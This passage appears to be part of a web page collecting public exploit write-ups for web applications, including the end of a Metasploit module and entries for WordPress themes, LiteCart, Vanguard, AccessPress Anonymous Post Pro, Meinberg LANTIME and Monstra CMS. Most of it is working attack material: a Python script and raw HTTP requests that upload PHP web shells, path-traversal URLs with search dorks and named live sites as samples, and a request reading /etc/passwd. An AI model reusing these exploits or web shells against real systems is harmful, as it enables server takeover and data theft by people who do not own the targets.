&& /Call to a member function getChild\(\) on a non\-object/ === res.body fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?') elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') ) fail_with(Failure::Unknown, 'Unable to upload payload.') end vprint_good("#{peer} - Uploaded the payload.") php_fname = 'image.php' payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname) vprint_status("#{peer} - Parsed response.") register_files_for_cleanup(php_fname) vprint_status("#{peer} - Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' ) end end
  20. # Exploit Title: UWordpress dreamsmiths Themes Arbitrary File Download # Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/ # Date: 2018/01/08 # Vendor Homepage: iranhack.com # Software Link: http://www.dreamsmiths.com/ # Version: 0.0.1 # Tested on: 7 , KAli P0c: Arbitrary Download PHP File in all WordPress themes By dreamsmiths : site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.phpsite.com/wp-content/themes/optimus/download.php?file=../../../index.phpsite.com/wp-content/themes/erinvale/download.php?file=../../../index.phpsite.com/wp-content/themes/hsv/download.php?file=../../../index.php Sample: https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
  21. # Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload # Date: 2018-08-27 # Software Link: https://www.litecart.net/downloading?version=2.1.2 # Version: 2.1.2 # CVE : CVE-2018-12256 # 1. Description # admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers # to upload a malicious file (resulting in remote code execution) by using the text/xml # or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request. # 2. Proof of Concept #!/usr/bin/env python import mechanize import cookielib import urllib2 import requests import sys import argparse import random import string parser = argparse.ArgumentParser(description='LiteCart') parser.add_argument('-t', help='admin login page url - EX: https://IPADDRESS/admin/') parser.add_argument('-p', help='admin password') parser.add_argument('-u', help='admin username') args = parser.parse_args() if(not args.u or not args.t or not args.p): sys.exit("-h for help") url = args.t user = args.u password = args.p br = mechanize.Browser() cookiejar = cookielib.LWPCookieJar() br.set_cookiejar( cookiejar ) br.set_handle_equiv( True ) br.set_handle_redirect( True ) br.set_handle_referer( True ) br.set_handle_robots( False ) br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ] response = br.open(url) br.select_form(name="login_form") br["username"] = user br["password"] = password res = br.submit() response = br.open(url + "?app=vqmods&doc=vqmods") one="" for form in br.forms(): one= str(form).split("(") one= one[1].split("=") one= one[1].split(")") one = one[0] cookies = br._ua_handlers['_cookies'].cookiejar cookie_dict = {} for c in cookies: cookie_dict[c.name] = c.value rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5)) files = { 'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"), 'token':one, 'upload':(None,"Upload") } response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict) r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id") if r.status_code == 200: print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id" print r.content else: print "Sorry something went wrong"
  22. # # # # # # Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload # Dork: N/A # Date: 11.12.2017 # Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio # Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 # Demo: http://vanguard-demo.esy.es/ # Version: 1.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # ..................... # $row = $row->fetch(PDO::FETCH_ASSOC); # $folder_name = $row['id'] * 2; # $folder_name_2 = $folder_name * 5; # $check_dir1 = 'uploads/'.$folder_name; # $check_dir2 = $check_dir.'/'.$folder_name_2; # if (!is_dir($check_dir1)) { mkdir($check_dir1); } # if (!is_dir($check_dir2)) { mkdir($check_dir2); } # $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']); # $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']); # $main_path = $check_dir2."/".basename($_FILES['main_file']['name']); # $error = 0; # $upload_path = './'; # ..................... # # Proof of Concept: # # Users Add a new product/Add a product preview... # # http://localhost/[PATH]/ # http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php # # # # # #
  23. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: colette@defiant.com # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  24. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004 Vulnerability: ************** Arbitrary File Read: ==================== It is possible to read arbitrary file on the system with root permissions Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file. Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com
  25. Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/security_prince Website: https://about.me/security-prince Category: webapps Platform: PHP Advisory Link: https://blogs.securiteam.com/index.php/archives/3559 Description: MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server. Vulnerable Code: https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19: public static function main() { // Array of forbidden types $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'); Proof of Concept Steps to Reproduce: 1. Login with a valid credentials of an Editor 2. Select Files option from the Drop-down menu of Content 3. Upload a file with PHP (uppercase)extension containing the below code: <?php $cmd=$_GET['cmd']; system($cmd); ?> 4. Click on Upload 5. Once the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc. Recommended Patch: We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here: https://github.com/monstra-cms/monstra/issues/426
×
×
  • جدید...